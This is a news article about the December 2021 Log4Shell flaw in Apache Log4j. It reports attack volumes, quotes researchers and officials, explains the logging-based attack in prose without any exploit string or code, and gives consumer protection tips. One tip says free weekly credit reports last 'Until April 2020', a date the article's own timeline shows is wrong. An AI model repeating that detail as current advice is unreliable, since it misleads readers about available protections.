The very serious server-software flaw named "Log4Shell" that affected many Minecraft players at the end of last week has, as feared, come to affect the entire internet. In terms of potential impact, it's one of the most severe computer-security vulnerabilities the world has ever seen.
"I cannot overstate the seriousness of this threat," researcher Lotem Finkelstein of Israeli security firm Check Point told ZDNet.
His firm has seen more than 850,000 attempted attacks on servers since a working exploit for the vulnerability was posted online Thursday (Dec. 9). Antivirus firm ESET said the U.S., U.K., Turkey, Germany and the Netherlands were seeing the most attacks.
The good news: This flaw doesn't directly affect the average computer user, except for Minecraft players using the Java Edition and other PC users who for one reason or other are running a Java environment.
The Java software in question has been fully patched as of Dec. 13 — an earlier version that mitigated the flaw went up Dec. 8 — but it's useful only if you actively run a web server. (Minecraft users need to just update their client software.)
The bad news: Hundreds of thousands, perhaps millions, of web servers are affected and can be hacked with very little effort. Criminals are already using the flaw to install coin-mining, botnet and backdoor malware on servers, report Microsoft and the Swiss government.
The flaw has been given a 10 out of 10 on the severity scale by the Apache Software Foundation, which maintains the software.
"There is an extremely high chance, almost certain, that every person interacts with some software or technology that has this vulnerability tucked away somewhere," Huntress Labs researcher John Hammond told Dark Reading.
Servers run by Amazon, Apple, Baidu, LinkedIn, QQ, Steam, Tencent, Tesla and Twitter are or until recently were vulnerable to some extent, although internal safeguards may prevent further exploitation in each case.
(There are reports that Apple has patched its servers, but we couldn't find the original source for those reports, and Apple has not yet responded to our request for confirmation.)
We can expect to see a lot of data breaches, ransomware attacks, credit-card thefts and perhaps even "drive-by downloads" resulting from this flaw. If anything is stored on a web server, it's at risk.
Bitdefender reported Dec. 13 that it had observed online criminals using the Log4Shell flaw to install ransomware and remote-access Trojans on Windows PC, but it wasn't clear whether the affected PCs had Java previously installed or not. We've reached out to Bitdefender for clarification.
Way more. We’re seeing >1,000 attempted exploits per second. And payloads getting scarier. Ransomware payloads started in force in last 24 hours.December 14, 2021
Log4Shell: 'Unbelievably simple' attack
"The exploit is actually unbelievably simple — which makes it very, very scary at the same time," Bogdan Zdrnja of the non-profit SANS Institute told Vice Motherboard.
All that an attacker needs to do is to send a web server a small string of carefully crafted text. The text can be a forum post, a login attempt, a header string in a web page or any other kind of data that might ordinarily be "logged" by a server along with hundreds of thousands of daily log entries.
The attacker's text will trick the targeted server into disclosing secret information, or even into sending a request for files to another server — such as one that the attacker controls. In response, the attacker's server can send a command to download and execute malware to the targeted server — which the targeted server will then carry out.
One jokester even put the exploit code into the name of his iPhone and got an Apple server to respond.
Jen Easterly, director of the U.S. federal government's Cybersecurity and Infrastructure Security Agency (CISA) called this flaw a "severe risk" and "an urgent challenge to network defenders" in an official advisory.
CyberScoop reported that in a call with tech-company executives Monday, Easterly said the vulnerability "is one of the most serious I've seen in my entire career, if not the most serious."
What can you to do defend yourself from Log4Shell?
As an end user, there's not much you can do to fix the affected servers unless you happen to have Java installed. (Security experts recommended that PC and Mac users disable Java years ago, and there are few reasons to use it nowadays).
However, because online criminals will exploit this flaw any way they can, you need to prepare yourself for the worst.
Expect that your personal information will be disclosed in data breaches resulting from this flaw, and that you will be at greater risk of identity theft. Expect that some of your passwords will be stolen and some of your online accounts hijacked.
Expect that your favorite online retail websites will be hacked to steal your credit-card number, a likelihood compounded by the holiday shopping season. Expect that some websites you frequently visit will be corrupted to send you malware.
In other words, the risks that you already face online will be dialed up to the maximum. Here's what you need to do.
Sign up with and use a password manager. There's no excuse not to do this, as many of the best password managers are partly or totally free. Use the password manager to make sure all your passwords are strong and unique. You want to do this today, not tomorrow, so that if one of your account passwords is compromised, only one account will be in danger, not all of them.
Set up a free credit freeze to limit the damage from potential identity theft. You may also want to consider one of the best identity theft protection services, but the credit freeze is the best preventive measure you can take.
Monitor your credit-card accounts for the next few weeks. If you see anything that looks wrong, call the phone number on the back of the card and tell the bank that issued the card right away.
Monitor your credit reports for the next few months. Until April 2020, U.S. residents are allowed to get one free credit report from each of the three big credit bureaus (Equifax, Experian and TransUnion) every week.
Install some of the best antivirus software. Windows 10 and 11 already have Microsoft Defender Antivirus built in, and it's very good, but it doesn't protect you from web-based threats coming in through non-Microsoft browsers such as Google Chrome or Mozilla Firefox. Microsoft Defender also doesn't help much with Android, Mac or iOS.
To be fair, all of these recommendations are things that you really ought to be doing anyway. But the fact that half the internet is in immediate danger of being horribly hacked makes these safeguards crucially important.
Log4Shell flaw explained
Very briefly, the Log4Shell flaw, catalogued as CVE-2021-44228, lies in a piece of open-source software called Log4j, a simple logging program for Java-based applications that's maintained by unpaid volunteers for the Apache Foundation.
This incident has renewed calls for the huge corporations that use open-source code to kick back some cash to the developers, who work on these tools in their spare time.
If you use software made by others in their spare time and find it useful, pay them. This should not be a controversial opinion. https://t.co/XDMFIcTlsWDecember 11, 2021
Logging programs are meant to simply record events, not actively execute code. But Log4j does a poor job of "sanitizing" the data that it takes in. As such, attackers can sneak in malicious code as described above, then get the Java-based server to run the code.
Because Java is a cross-platform environment designed to "live" on many kinds of operating systems, servers running Windows, Linux, Unix or even macOS are equally vulnerable.
Speculation that Java libraries such as Log4j might be vulnerable to attack dates back to a 2016 Black Hat presentation. But this particular vulnerability was reported Nov. 24 to the Apache Foundation by researchers with Chinese internet giant Alibaba, and a fix was quietly developed over the following two weeks and released Dec. 8.
Mass attacks using the flaw began as soon as the proof-of-concept code was posted early the next morning. Internet-security firms Cloudflare and Cisco Talos checked their logs, however, and found evidence of possible exploit attempts as far back as Dec. 1.
Those "attempts" may have been the result of defenders pinging servers to see how widespread the vulnerability was. But it could also be that the flaw was privately leaked to state-sponsored security services, as a different flaw may have been earlier this year.
Updated with additional information. This story was originally posted Dec. 13.